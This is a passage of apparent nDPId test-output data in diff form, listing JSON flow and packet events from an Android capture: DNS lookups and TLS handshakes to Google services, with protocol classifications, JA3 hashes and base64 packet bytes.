{"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871069,"flow_last_seen":1582454871207,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871207,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32988,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00904{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":260,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871152,"flow_last_seen":1582454871230,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1598,"flow_avg_l4_payload_len":266,"midstream":0,"thread_ts_msec":1582454871230,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +01154{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":261,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454871152,"flow_last_seen":1582454871230,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2734,"flow_avg_l4_payload_len":390,"midstream":0,"thread_ts_msec":1582454871230,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","server_names":"www.google.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=www.google.com","alpn":"http\/1.1","fingerprint":"32:07:6C:9F:96:7D:CE:82:15:C6:C5:7B:49:90:53:A1:CF:80:4F:B0"}} +01081{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":264,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871069,"flow_last_seen":1582454871237,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871237,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32988,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": 
{"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.3","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":274,"source":"android.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871292,"flow_last_seen":1582454871292,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871292,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":46359,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"android.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1582454871292,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1582454871292,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBq9RAAEARCXbAqAIQwKgCAbUXADUALUF1Da4BAAABAAAAAAAACGFjY291bnRzBmdvb2dsZQNjb20AAAEAAQ=="} 
-00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"android.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871292,"flow_last_seen":1582454871292,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871292,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":46359,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"accounts.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"android.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871292,"flow_last_seen":1582454871292,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871292,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":46359,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"accounts.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":276,"source":"android.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1582454871294,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1582454871294,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRfN0AAEAReF3AqAIBwKgCEAA1tRcAPWwTDa6BgAABAAEAAAAACGFjY291bnRzBmdvb2dsZQNjb20AAAEAAcAMAAEAAQAAANoABNjvJng="} -00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":276,"source":"android.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871292,"flow_last_seen":1582454871294,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871294,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":46359,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"accounts.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}} +00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":276,"source":"android.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871292,"flow_last_seen":1582454871294,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871294,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":46359,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": 
{"query":"accounts.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":280,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871321,"flow_last_seen":1582454871321,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871321,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32998,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1582454871321,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871321,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8nfFAAEAG2qrAqAIQ2O8meIDmAbsuQarwAAAAAKAC\/\/\/zCgAAAgQFtAQCCAr\/\/zcBAAAAAAEDAwg="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1582454871334,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871334,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8saEAAHUG0frY7yZ4wKgCEAG7gOY64cVhLkGq8aAS6yCKsAAAAgQFZAQCCAofL14G\/\/83AQEDAwg="} 
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1582454871335,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871335,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0nfJAAEAG2rHAqAIQ2O8meIDmAbsuQarxOuHFYoAQAVei8wAAAQEICv\/\/NwUfL14G"} -00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871321,"flow_last_seen":1582454871339,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871339,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32998,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871321,"flow_last_seen":1582454871339,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871339,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32998,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":291,"source":"android.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871343,"flow_last_seen":1582454871343,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1582454871343,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35689,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"android.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1582454871343,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":1582454871343,"pkt":"xiwDYGpkTGr2n\/YnCABFAABQq9VAAEARCWbAqAIQwKgCAYtpADUAPJHqlgwBAAABAAAAAAAAE3NlbWFudGljbG9jYXRpb24tcGEKZ29vZ2xlYXBpcwNjb20AAAEAAQ=="} -00797{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":291,"source":"android.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871343,"flow_last_seen":1582454871343,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1582454871343,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35689,"dst_port":53,"l4_proto":"udp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"semanticlocation-pa.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00959{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":298,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454871321,"flow_last_seen":1582454871370,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1582454871370,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32998,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"accounts.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00797{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":291,"source":"android.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871343,"flow_last_seen":1582454871343,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1582454871343,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35689,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": 
{"query":"semanticlocation-pa.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00959{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":298,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454871321,"flow_last_seen":1582454871370,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1582454871370,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32998,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"accounts.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"android.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1582454871383,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1582454871383,"pkt":"TGr2n\/YnxiwDYGpkCABFAABgqGIAAEARTMnAqAIBwKgCEAA1i2kATI9glgyBgAABAAEAAAAAE3NlbWFudGljbG9jYXRpb24tcGEKZ29vZ2xlYXBpcwNjb20AAAEAAcAMAAEAAQAAALIABKzZFEo="} 
-00812{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":310,"source":"android.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871343,"flow_last_seen":1582454871383,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1582454871383,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35689,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"semanticlocation-pa.googleapis.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.20.74"}} +00812{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":310,"source":"android.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871343,"flow_last_seen":1582454871383,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1582454871383,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35689,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"semanticlocation-pa.googleapis.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.20.74"}} 
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":324,"source":"android.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871496,"flow_last_seen":1582454871496,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871496,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":22850,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":324,"source":"android.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1582454871496,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1582454871496,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBq+5AAEARCVzAqAIQwKgCAVlCADUALUQf0TEBAAABAAAAAAAABXByb3h5CWdvb2dsZXppcANuZXQAAAEAAQ=="} -00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":324,"source":"android.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871496,"flow_last_seen":1582454871496,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871496,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":22850,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"proxy.googlezip.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":324,"source":"android.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871496,"flow_last_seen":1582454871496,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871496,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":22850,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"proxy.googlezip.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":332,"source":"android.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1582454871536,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1582454871536,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRnZYAAEARV6TAqAIBwKgCEAA1WUIAPff70TGBgAABAAEAAAAABXByb3h5CWdvb2dsZXppcANuZXQAAAEAAcAMAAEAAQAAAJMABKzZFEw="} -00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":332,"source":"android.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871496,"flow_last_seen":1582454871536,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871536,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":22850,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": 
{"query":"proxy.googlezip.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.20.76"}} +00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":332,"source":"android.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871496,"flow_last_seen":1582454871536,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871536,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":22850,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"proxy.googlezip.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.20.76"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":335,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871553,"flow_last_seen":1582454871553,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871553,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43634,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":335,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1582454871553,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871553,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8o7ZAAEAGEyjAqAIQrNkUTKpyAbt9gJSNAAAAAKAC\/\/\/OqgAAAgQFtAQCCAr\/\/zc7AAAAAAEDAwg="} 
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":336,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1582454871591,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871591,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8n5IAAHUGIkys2RRMwKgCEAG7qnIP+mJJfYCUjqAS6yAAJQAAAgQFZAQCCAqRSuAV\/\/83OwEDAwg="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":337,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1582454871592,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871592,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0o7dAAEAGEy\/AqAIQrNkUTKpyAbt9gJSOD\/piSoAQAVcYYgAAAQEICv\/\/N0WRSuAV"} 